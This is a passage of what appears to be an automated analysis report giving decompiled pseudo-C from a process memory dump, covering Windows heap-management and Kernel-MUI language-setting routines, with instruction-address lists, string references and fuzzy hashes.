                                            												}
                                            												_push("(LONG)FreeEntry->Size > 1");
                                            												E00FEB150();
                                            												__eflags =  *0x10d7bc8 - _t446; // 0x0
                                            												if(__eflags == 0) {
                                            													__eflags = 1;
                                            													E010A2073(_t446, 1, _t541, 1);
                                            												}
                                            												_t468 = _v36;
                                            											}
                                            										}
                                            										_t468[1] = _t446;
                                            										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                            										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                            											_t320 = _t446;
                                            										} else {
                                            											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                            											_v12 = _t320;
                                            											__eflags = _t320 - 0xfe;
                                            											if(_t320 >= 0xfe) {
                                            												_push(_t468);
                                            												_push(_t446);
                                            												E010AA80D(_t522, 3, _t468, _t541);
                                            												_t468 = _v52;
                                            												_t320 = _v28;
                                            											}
                                            										}
                                            										_t468[3] = _t320;
                                            										E0100A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                            									}
                                            								}
                                            								E0100B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                            								E0100A830(_t553, _v64, _v24);
                                            								_t286 = E01007D50();
                                            								_t542 = 0x7ffe0380;
                                            								__eflags = _t286;
                                            								if(_t286 != 0) {
                                            									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            								} else {
                                            									_t289 = 0x7ffe0380;
                                            								}
                                            								__eflags =  *_t289;
                                            								if( *_t289 != 0) {
                                            									_t290 =  *[fs:0x30];
                                            									__eflags =  *(_t290 + 0x240) & 1;
                                            									if(( *(_t290 + 0x240) & 1) != 0) {
                                            										__eflags = E01007D50();
                                            										if(__eflags != 0) {
                                            											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										}
                                            										E010A1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                            									}
                                            								}
                                            								_t291 = E01007D50();
                                            								_t543 = 0x7ffe038a;
                                            								__eflags = _t291;
                                            								if(_t291 != 0) {
                                            									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            								} else {
                                            									_t246 = 0x7ffe038a;
                                            								}
                                            								__eflags =  *_t246;
                                            								if( *_t246 != 0) {
                                            									__eflags = E01007D50();
                                            									if(__eflags != 0) {
                                            										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            										__eflags = _t543;
                                            									}
                                            									_push( *_t543 & 0x000000ff);
                                            									_push(_t446);
                                            									_push(_t446);
                                            									L120:
                                            									_push( *(_t553 + 0x74) << 3);
                                            									_push(_v52);
                                            									_t246 = E010A1411(_t446, _t553, _v44, __eflags);
                                            								}
                                            								goto L7;
                                            							}
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t339 = E0101174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t339;
                                            							if(_t339 < 0) {
                                            								L94:
                                            								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									goto L153;
                                            								}
                                            								E0100B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                            								goto L152;
                                            							}
                                            							_t344 = E01007D50();
                                            							__eflags = _t344;
                                            							if(_t344 != 0) {
                                            								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t347 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t347;
                                            							if( *_t347 != 0) {
                                            								_t348 =  *[fs:0x30];
                                            								__eflags =  *(_t348 + 0x240) & 1;
                                            								if(( *(_t348 + 0x240) & 1) != 0) {
                                            									E010A14FB(_t445, _t553, _v44, _v52, 6);
                                            								}
                                            							}
                                            							_t513 = _v48;
                                            							goto L33;
                                            						}
                                            						__eflags =  *_v12 - 3;
                                            						_t513 = _v48;
                                            						if( *_v12 == 3) {
                                            							goto L27;
                                            						}
                                            						__eflags = _t460;
                                            						if(_t460 == 0) {
                                            							goto L9;
                                            						}
                                            						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                            						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                            							goto L9;
                                            						}
                                            						goto L27;
                                            					}
                                            				}
                                            				_t445 = _a4;
                                            				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                            					_t513 = __edx;
                                            					goto L10;
                                            				}
                                            				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                            				_v20 = _t433;
                                            				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                            					_t513 = _t539;
                                            					goto L9;
                                            				} else {
                                            					_t437 = E010099BF(__ecx, __edx,  &_a4, 0);
                                            					_t445 = _a4;
                                            					_t514 = _t437;
                                            					_v56 = _t514;
                                            					if(_t445 - 0x201 > 0xfbff) {
                                            						goto L14;
                                            					} else {
                                            						E0100A830(__ecx, _t514, _t445);
                                            						_t506 =  *(_t553 + 0x238);
                                            						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                            						_t246 = _t506 >> 4;
                                            						if(_t551 < _t506 - _t246) {
                                            							_t508 =  *(_t553 + 0x23c);
                                            							_t246 = _t508 >> 2;
                                            							__eflags = _t551 - _t508 - _t246;
                                            							if(_t551 > _t508 - _t246) {
                                            								_t246 = E0101ABD8(_t553);
                                            								 *(_t553 + 0x23c) = _t551;
                                            								 *(_t553 + 0x238) = _t551;
                                            							}
                                            						}
                                            						goto L7;
                                            					}
                                            				}
                                            			}
                                            0x01051eca
                                            0x01051ed1
                                            0x00000000
                                            0x00000000
                                            0x01051ed7
                                            0x00000000
                                            0x0100a65b
                                            0x0100a669
                                            0x0100a66e
                                            0x0100a670
                                            0x00000000
                                            0x00000000
                                            0x0100a676
                                            0x0100a67b
                                            0x0100a680
                                            0x0100a682
                                            0x01051f1a
                                            0x0100a688
                                            0x0100a688
                                            0x0100a688
                                            0x0100a68a
                                            0x0100a68d
                                            0x01051f24
                                            0x01051f2a
                                            0x01051f31
                                            0x01051f43
                                            0x01051f43
                                            0x01051f31
                                            0x0100a693
                                            0x0100a697
                                            0x0100a69d
                                            0x0100a6a0
                                            0x0100a6a6
                                            0x0100a6a8
                                            0x0100a6a8
                                            0x0100a6a8
                                            0x0100a6a8
                                            0x0100a6b2
                                            0x0100a6b7
                                            0x0100a6c1
                                            0x0100a6c6
                                            0x0100a6d2
                                            0x0100a6d9
                                            0x0100a6e3
                                            0x0100a6e6
                                            0x0100a6eb
                                            0x0100a6ed
                                            0x0100a6ed
                                            0x0100a6ed
                                            0x0100a6ed
                                            0x0100a6f3
                                            0x0100a6f8
                                            0x0100a702
                                            0x0100a70a
                                            0x0100a70e
                                            0x0100a71a
                                            0x0100a71e
                                            0x01051fcb
                                            0x01051fcf
                                            0x01051fdd
                                            0x01051fe3
                                            0x01051fe3
                                            0x0100a724
                                            0x0100a728
                                            0x0100a72a
                                            0x0100a72d
                                            0x0100a737
                                            0x0100a73a
                                            0x0100a73c
                                            0x0100a742
                                            0x0100a748
                                            0x01051f4d
                                            0x01051f50
                                            0x01051f56
                                            0x01051f5c
                                            0x01051f5f
                                            0x01051f7e
                                            0x01051f83
                                            0x01051f61
                                            0x01051f76
                                            0x01051f7b
                                            0x01051f89
                                            0x01051f8e
                                            0x01051f93
                                            0x01051f94
                                            0x01051f9a
                                            0x01051f9c
                                            0x01051f9e
                                            0x01051fa1
                                            0x01051fa1
                                            0x01051fa6
                                            0x01051fa6
                                            0x01051f50
                                            0x0100a74e
                                            0x0100a751
                                            0x0100a754
                                            0x0100a75d
                                            0x0100a75e
                                            0x0100a762
                                            0x0100a767
                                            0x01051faf
                                            0x01051fb0
                                            0x01051fb9
                                            0x01051fbe
                                            0x01051fc2
                                            0x01051fc2
                                            0x0100a76d
                                            0x0100a76d
                                            0x0100a775
                                            0x0100a778
                                            0x0100a77d
                                            0x0100a77d
                                            0x0100a71e
                                            0x0100a782
                                            0x0100a787
                                            0x0100a789
                                            0x01051ff3
                                            0x0100a78f
                                            0x0100a78f
                                            0x0100a78f
                                            0x0100a791
                                            0x0100a794
                                            0x01051ffd
                                            0x01052006
                                            0x0105200c
                                            0x01052017
                                            0x01052019
                                            0x01052024
                                            0x01052024
                                            0x01052024
                                            0x01052047
                                            0x01052047
                                            0x0105200c
                                            0x0100a79a
                                            0x0100a79f
                                            0x0100a7a4
                                            0x0100a7a9
                                            0x0100a7ab
                                            0x0105205a
                                            0x0100a7b1
                                            0x0100a7b1
                                            0x0100a7b1
                                            0x0100a7b3
                                            0x0100a7b6
                                            0x00000000
                                            0x0100a7bc
                                            0x01052066
                                            0x01052068
                                            0x01052073
                                            0x01052073
                                            0x01052073
                                            0x01052078
                                            0x01052079
                                            0x0105207d
                                            0x00000000
                                            0x0105207d
                                            0x0100a7b6
                                            0x0100a440
                                            0x0100a440
                                            0x0100a440
                                            0x0100a446
                                            0x0100a44c
                                            0x0100a44f
                                            0x0100a453
                                            0x0100a455
                                            0x010520b3
                                            0x010520b9
                                            0x010520b9
                                            0x0100a45d
                                            0x0100a460
                                            0x0100a464
                                            0x0100a466
                                            0x0100a46b
                                            0x0100a46f
                                            0x0100a471
                                            0x0100a471
                                            0x0100a471
                                            0x0100a474
                                            0x0100a479
                                            0x0100a47d
                                            0x0100a47f
                                            0x01052229
                                            0x0105222f
                                            0x0100a3c8
                                            0x0100a3c8
                                            0x0100a3ca
                                            0x0100a3ca
                                            0x00000000
                                            0x0100a3ca
                                            0x01052235
                                            0x0105223a
                                            0x0105223a
                                            0x00000000
                                            0x00000000
                                            0x01052240
                                            0x01052246
                                            0x0105224a
                                            0x01052269
                                            0x0105226e
                                            0x0105224c
                                            0x01052261
                                            0x01052266
                                            0x01052274
                                            0x01052279
                                            0x0105227e
                                            0x01052286
                                            0x01052288
                                            0x0105228d
                                            0x0105228d
                                            0x01052292
                                            0x01052292
                                            0x01052295
                                            0x01052295
                                            0x00000000
                                            0x01052295
                                            0x0100a485
                                            0x0100a489
                                            0x0100a48b
                                            0x0100a48f
                                            0x0100a493
                                            0x0100a497
                                            0x0100a49b
                                            0x0100a4bb
                                            0x0100a4bb
                                            0x0100a4bd
                                            0x0100a4ff
                                            0x0100a4ff
                                            0x0100a501
                                            0x0100a505
                                            0x0100a50f
                                            0x0100a517
                                            0x0100a51b
                                            0x0100a527
                                            0x0100a52b
                                            0x01052182
                                            0x01052185
                                            0x01052193
                                            0x01052199
                                            0x01052199
                                            0x0100a531
                                            0x0100a535
                                            0x0100a538
                                            0x0100a548
                                            0x0100a54b
                                            0x0100a54d
                                            0x0100a553
                                            0x0100a559
                                            0x01052100
                                            0x01052103
                                            0x01052109
                                            0x0105210f
                                            0x01052112
                                            0x01052131
                                            0x01052136
                                            0x01052114
                                            0x01052129
                                            0x0105212e
                                            0x0105213c
                                            0x01052141
                                            0x01052147
                                            0x0105214d
                                            0x01052151
                                            0x01052154
                                            0x01052154
                                            0x01052159
                                            0x01052159
                                            0x01052103
                                            0x0100a55f
                                            0x0100a562
                                            0x0100a565
                                            0x0100a567
                                            0x01052162
                                            0x0100a56d
                                            0x0100a574
                                            0x0100a575
                                            0x0100a579
                                            0x0100a57e
                                            0x01052169
                                            0x0105216a
                                            0x01052170
                                            0x01052175
                                            0x01052179
                                            0x01052179
                                            0x0100a57e
                                            0x0100a584
                                            0x0100a58f
                                            0x0100a58f
                                            0x0100a52b
                                            0x0100a5ad
                                            0x0100a5bc
                                            0x0100a5c1
                                            0x0100a5c6
                                            0x0100a5cb
                                            0x0100a5cd
                                            0x010521a9
                                            0x0100a5d3
                                            0x0100a5d3
                                            0x0100a5d3
                                            0x0100a5d5
                                            0x0100a5d8
                                            0x010521b3
                                            0x010521bc
                                            0x010521c2
                                            0x010521cd
                                            0x010521cf
                                            0x010521da
                                            0x010521da
                                            0x010521da
                                            0x010521f7
                                            0x010521f7
                                            0x010521c2
                                            0x0100a5de
                                            0x0100a5e3
                                            0x0100a5e8
                                            0x0100a5ea
                                            0x0105220a
                                            0x0100a5f0
                                            0x0100a5f0
                                            0x0100a5f0
                                            0x0100a5f2
                                            0x0100a5f5
                                            0x01052219
                                            0x0105221b
                                            0x0105208c
                                            0x0105208c
                                            0x0105208c
                                            0x01052095
                                            0x01052096
                                            0x01052097
                                            0x01052098
                                            0x010520a4
                                            0x010520a5
                                            0x010520a9
                                            0x010520a9
                                            0x00000000
                                            0x0100a5f5
                                            0x0100a4bf
                                            0x0100a4d3
                                            0x0100a4d8
                                            0x0100a4da
                                            0x01051ede
                                            0x01051ede
                                            0x01051ee4
                                            0x01051ee9
                                            0x00000000
                                            0x00000000
                                            0x01051f07
                                            0x00000000
                                            0x01051f07
                                            0x0100a4e0
                                            0x0100a4e5
                                            0x0100a4e7
                                            0x010520cb
                                            0x0100a4ed
                                            0x0100a4ed
                                            0x0100a4ed
                                            0x0100a4f2
                                            0x0100a4f5
                                            0x010520d5
                                            0x010520de
                                            0x010520e4
                                            0x010520f6
                                            0x010520f6
                                            0x010520e4
                                            0x0100a4fb
                                            0x00000000
                                            0x0100a4fb
                                            0x0100a4a1
                                            0x0100a4a4
                                            0x0100a4a8
                                            0x00000000
                                            0x00000000
                                            0x0100a4aa
                                            0x0100a4ac
                                            0x00000000
                                            0x00000000
                                            0x0100a4b2
                                            0x0100a4b5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0100a4b5
                                            0x0100a43a
                                            0x0100a340
                                            0x0100a346
                                            0x0100a600
                                            0x00000000
                                            0x0100a600
                                            0x0100a34f
                                            0x0100a351
                                            0x0100a358
                                            0x0100a3c6
                                            0x00000000
                                            0x0100a371
                                            0x0100a37a
                                            0x0100a37f
                                            0x0100a382
                                            0x0100a384
                                            0x0100a394
                                            0x00000000
                                            0x0100a396
                                            0x0100a399
                                            0x0100a3a7
                                            0x0100a3b0
                                            0x0100a3b4
                                            0x0100a3bb
                                            0x0100a3d2
                                            0x0100a3da
                                            0x0100a3df
                                            0x0100a3e1
                                            0x0100a3e5
                                            0x0100a3ea
                                            0x0100a3f0
                                            0x0100a3f0
                                            0x0100a3e1
                                            0x00000000
                                            0x0100a3bb
                                            0x0100a394

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: 2fe3cbf98e67a43410bc6a4a1d3375cf174b4917c49c18e2e290722654e3b578
                                            • Instruction ID: 3961d6edc390ee1472abf33ecfb71f8745202dcadf7d6d20a3221a57b112289f
                                            • Opcode Fuzzy Hash: 2fe3cbf98e67a43410bc6a4a1d3375cf174b4917c49c18e2e290722654e3b578
                                            • Instruction Fuzzy Hash: CB42BF31608741DFE756CB28C884B6BBBE5BF84714F04896DF9C68B292D734D941CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00FF3D34(signed int* __ecx) {
                                            				signed int* _v8;
                                            				char _v12;
                                            				signed int* _v16;
                                            				signed int* _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int* _v48;
                                            				signed int* _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				char _v68;
                                            				signed int _t140;
                                            				signed int _t161;
                                            				signed int* _t236;
                                            				signed int* _t242;
                                            				signed int* _t243;
                                            				signed int* _t244;
                                            				signed int* _t245;
                                            				signed int _t255;
                                            				void* _t257;
                                            				signed int _t260;
                                            				void* _t262;
                                            				signed int _t264;
                                            				void* _t267;
                                            				signed int _t275;
                                            				signed int* _t276;
                                            				short* _t277;
                                            				signed int* _t278;
                                            				signed int* _t279;
                                            				signed int* _t280;
                                            				short* _t281;
                                            				signed int* _t282;
                                            				short* _t283;
                                            				signed int* _t284;
                                            				void* _t285;
                                            
                                            				_v60 = _v60 | 0xffffffff;
                                            				_t280 = 0;
                                            				_t242 = __ecx;
                                            				_v52 = __ecx;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v40 = 0;
                                            				_v28 = 0;
                                            				_v32 = 0;
                                            				_v44 = 0;
                                            				_v56 = 0;
                                            				_t275 = 0;
                                            				_v16 = 0;
                                            				if(__ecx == 0) {
                                            					_t280 = 0xc000000d;
                                            					_t140 = 0;
                                            					L50:
                                            					 *_t242 =  *_t242 | 0x00000800;
                                            					_t242[0x13] = _t140;
                                            					_t242[0x16] = _v40;
                                            					_t242[0x18] = _v28;
                                            					_t242[0x14] = _v32;
                                            					_t242[0x17] = _t275;
                                            					_t242[0x15] = _v44;
                                            					_t242[0x11] = _v56;
                                            					_t242[0x12] = _v60;
                                            					return _t280;
                                            				}
                                            				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v56 = 1;
                                            					if(_v8 != 0) {
                                            						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                            					}
                                            					_v8 = _t280;
                                            				}
                                            				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v60 =  *_v8;
                                            					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                            					_v8 = _t280;
                                            				}
                                            				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            					L16:
                                            					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            						L28:
                                            						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                            							L46:
                                            							_t275 = _v16;
                                            							L47:
                                            							_t161 = 0;
                                            							L48:
                                            							if(_v8 != 0) {
                                            								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                            							}
                                            							_t140 = _v20;
                                            							if(_t140 != 0) {
                                            								if(_t275 != 0) {
                                            									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                            									_t275 = 0;
                                            									_v28 = 0;
                                            									_t140 = _v20;
                                            								}
                                            							}
                                            							goto L50;
                                            						}
                                            						_t167 = _v12;
                                            						_t255 = _v12 + 4;
                                            						_v44 = _t255;
                                            						if(_t255 == 0) {
                                            							_t276 = _t280;
                                            							_v32 = _t280;
                                            						} else {
                                            							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                            							_t167 = _v12;
                                            							_v32 = _t276;
                                            						}
                                            						if(_t276 == 0) {
                                            							_v44 = _t280;
                                            							_t280 = 0xc0000017;
                                            							goto L46;
                                            						} else {
                                            							E0102F3E0(_t276, _v8, _t167);
                                            							_v48 = _t276;
                                            							_t277 = E01031370(_t276, 0xfc4e90);
                                            							_pop(_t257);
                                            							if(_t277 == 0) {
                                            								L38:
                                            								_t170 = _v48;
                                            								if( *_v48 != 0) {
                                            									E0102BB40(0,  &_v68, _t170);
                                            									if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            										_t280 =  &(_t280[0]);
                                            									}
                                            								}
                                            								if(_t280 == 0) {
                                            									_t280 = 0;
                                            									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                            									_v44 = 0;
                                            									_v32 = 0;
                                            								} else {
                                            									_t280 = 0;
                                            								}
                                            								_t174 = _v8;
                                            								if(_v8 != 0) {
                                            									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                            								}
                                            								_v8 = _t280;
                                            								goto L46;
                                            							}
                                            							_t243 = _v48;
                                            							do {
                                            								 *_t277 = 0;
                                            								_t278 = _t277 + 2;
                                            								E0102BB40(_t257,  &_v68, _t243);
                                            								if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            									_t280 =  &(_t280[0]);
                                            								}
                                            								_t243 = _t278;
                                            								_t277 = E01031370(_t278, 0xfc4e90);
                                            								_pop(_t257);
                                            							} while (_t277 != 0);
                                            							_v48 = _t243;
                                            							_t242 = _v52;
                                            							goto L38;
                                            						}
                                            					}
                                            					_t191 = _v12;
                                            					_t260 = _v12 + 4;
                                            					_v28 = _t260;
                                            					if(_t260 == 0) {
                                            						_t275 = _t280;
                                            						_v16 = _t280;
                                            					} else {
                                            						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                            						_t191 = _v12;
                                            						_v16 = _t275;
                                            					}
                                            					if(_t275 == 0) {
                                            						_v28 = _t280;
                                            						_t280 = 0xc0000017;
                                            						goto L47;
                                            					} else {
                                            						E0102F3E0(_t275, _v8, _t191);
                                            						_t285 = _t285 + 0xc;
                                            						_v48 = _t275;
                                            						_t279 = _t280;
                                            						_t281 = E01031370(_v16, 0xfc4e90);
                                            						_pop(_t262);
                                            						if(_t281 != 0) {
                                            							_t244 = _v48;
                                            							do {
                                            								 *_t281 = 0;
                                            								_t282 = _t281 + 2;
                                            								E0102BB40(_t262,  &_v68, _t244);
                                            								if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            									_t279 =  &(_t279[0]);
                                            								}
                                            								_t244 = _t282;
                                            								_t281 = E01031370(_t282, 0xfc4e90);
                                            								_pop(_t262);
                                            							} while (_t281 != 0);
                                            							_v48 = _t244;
                                            							_t242 = _v52;
                                            						}
                                            						_t201 = _v48;
                                            						_t280 = 0;
                                            						if( *_v48 != 0) {
                                            							E0102BB40(_t262,  &_v68, _t201);
                                            							if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            								_t279 =  &(_t279[0]);
                                            							}
                                            						}
                                            						if(_t279 == 0) {
                                            							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                            							_v28 = _t280;
                                            							_v16 = _t280;
                                            						}
                                            						_t202 = _v8;
                                            						if(_v8 != 0) {
                                            							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                            						}
                                            						_v8 = _t280;
                                            						goto L28;
                                            					}
                                            				}
                                            				_t214 = _v12;
                                            				_t264 = _v12 + 4;
                                            				_v40 = _t264;
                                            				if(_t264 == 0) {
                                            					_v20 = _t280;
                                            				} else {
                                            					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                            					_t280 = _t236;
                                            					_v20 = _t236;
                                            					_t214 = _v12;
                                            				}
                                            				if(_t280 == 0) {
                                            					_t161 = 0;
                                            					_t280 = 0xc0000017;
                                            					_v40 = 0;
                                            					goto L48;
                                            				} else {
                                            					E0102F3E0(_t280, _v8, _t214);
                                            					_t285 = _t285 + 0xc;
                                            					_v48 = _t280;
                                            					_t283 = E01031370(_t280, 0xfc4e90);
                                            					_pop(_t267);
                                            					if(_t283 != 0) {
                                            						_t245 = _v48;
                                            						do {
                                            							 *_t283 = 0;
                                            							_t284 = _t283 + 2;
                                            							E0102BB40(_t267,  &_v68, _t245);
                                            							if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            								_t275 = _t275 + 1;
                                            							}
                                            							_t245 = _t284;
                                            							_t283 = E01031370(_t284, 0xfc4e90);
                                            							_pop(_t267);
                                            						} while (_t283 != 0);
                                            						_v48 = _t245;
                                            						_t242 = _v52;
                                            					}
                                            					_t224 = _v48;
                                            					_t280 = 0;
                                            					if( *_v48 != 0) {
                                            						E0102BB40(_t267,  &_v68, _t224);
                                            						if(L00FF43C0( &_v68,  &_v24) != 0) {
                                            							_t275 = _t275 + 1;
                                            						}
                                            					}
                                            					if(_t275 == 0) {
                                            						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                            						_v40 = _t280;
                                            						_v20 = _t280;
                                            					}
                                            					_t225 = _v8;
                                            					if(_v8 != 0) {
                                            						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                            					}
                                            					_v8 = _t280;
                                            					goto L16;
                                            				}
                                            			}

                                            Strings
                                            • Kernel-MUI-Language-SKU, xrefs: 00FF3F70
                                            • WindowsExcludedProcs, xrefs: 00FF3D6F
                                            • Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
                                            • Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0
                                            • Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                                            • Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
                                            • Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                                            • Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 29%
                                            			E00FE40E1(void* __edx) {
                                            				void* _t19;
                                            				void* _t29;
                                            
                                            				_t28 = _t19;
                                            				_t29 = __edx;
                                            				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E00FEB150("Invalid heap signature for heap at %p", _t28);
                                            					if(_t29 != 0) {
                                            						E00FEB150(", passed to %s", _t29);
                                            					}
                                            					_push("\n");
                                            					E00FEB150();
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10d6378 = 1;
                                            						asm("int3");
                                            						 *0x10d6378 = 0;
                                            					}
                                            					return 0;
                                            				}
                                            				return 1;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                            • API String ID: 0-188067316
                                            • Opcode ID: 64c49b094ddd80d6163ec7912958c4f784d77c7451c4aea8dc49a79636756740
                                            • Instruction ID: af6b4bc9d1138c17b0207bbbc2d5c07c348922d795f410a138f422371963d0fc
                                            • Opcode Fuzzy Hash: 64c49b094ddd80d6163ec7912958c4f784d77c7451c4aea8dc49a79636756740
                                            • Instruction Fuzzy Hash: 4C01407210D181AFD2255769D95FF9377E4DB80B30F14807DF10497692CFADD840E112
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E0100A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                            				void* _v5;
                                            				signed short _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				signed short _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed short _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				signed short* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t131;
                                            				signed char _t134;
                                            				signed int _t138;
                                            				char _t141;
                                            				signed short _t142;
                                            				void* _t146;
                                            				signed short _t147;
                                            				intOrPtr* _t149;
                                            				intOrPtr _t156;
                                            				signed int _t167;
                                            				signed int _t168;
                                            				signed short* _t173;
                                            				signed short _t174;
                                            				intOrPtr* _t182;
                                            				signed short _t184;
                                            				intOrPtr* _t187;
                                            				intOrPtr _t197;
                                            				intOrPtr _t206;
                                            				intOrPtr _t210;
                                            				signed short _t211;
                                            				intOrPtr* _t212;
                                            				signed short _t214;
                                            				signed int _t216;
                                            				intOrPtr _t217;
                                            				signed char _t225;
                                            				signed short _t235;
                                            				signed int _t237;
                                            				intOrPtr* _t238;
                                            				signed int _t242;
                                            				unsigned int _t245;
                                            				signed int _t251;
                                            				intOrPtr* _t252;
                                            				signed int _t253;
                                            				intOrPtr* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				void* _t260;
                                            
                                            				_t256 = __edx;
                                            				_t206 = __ecx;
                                            				_t235 = _a4;
                                            				_v44 = __ecx;
                                            				_v24 = _t235;
                                            				if(_t235 == 0) {
                                            					L41:
                                            					return _t131;
                                            				}
                                            				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                            				if(_t251 == 0) {
                                            					__eflags =  *0x10d8748 - 1;
                                            					if( *0x10d8748 >= 1) {
